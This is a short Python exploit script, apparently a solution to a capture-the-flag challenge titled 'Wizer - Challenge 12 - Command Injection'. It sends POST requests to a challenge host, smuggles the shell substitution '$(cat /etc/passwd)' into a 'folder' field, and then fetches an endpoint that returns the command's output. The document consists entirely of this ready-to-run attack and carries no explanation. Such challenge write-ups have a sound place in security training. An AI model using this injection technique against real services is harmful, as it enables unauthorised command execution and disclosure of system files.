Wizer - Challenge 12 - Command Injection

Exploit

import requests

url = "https://chal12.vercel.app"


# /getCompanyLogo


r = requests.post(url + "/addAssetsFolder", json={
    "companyId": "abababab-abab-0aba-Abab-abababababab",
    "folder": "a $(cat /etc/passwd) #"
})


print(r.text)



r = requests.post(url + "/companyAssets", json={
    "companyId": "abababab-abab-0aba-Abab-abababababab"
})


print(r.text)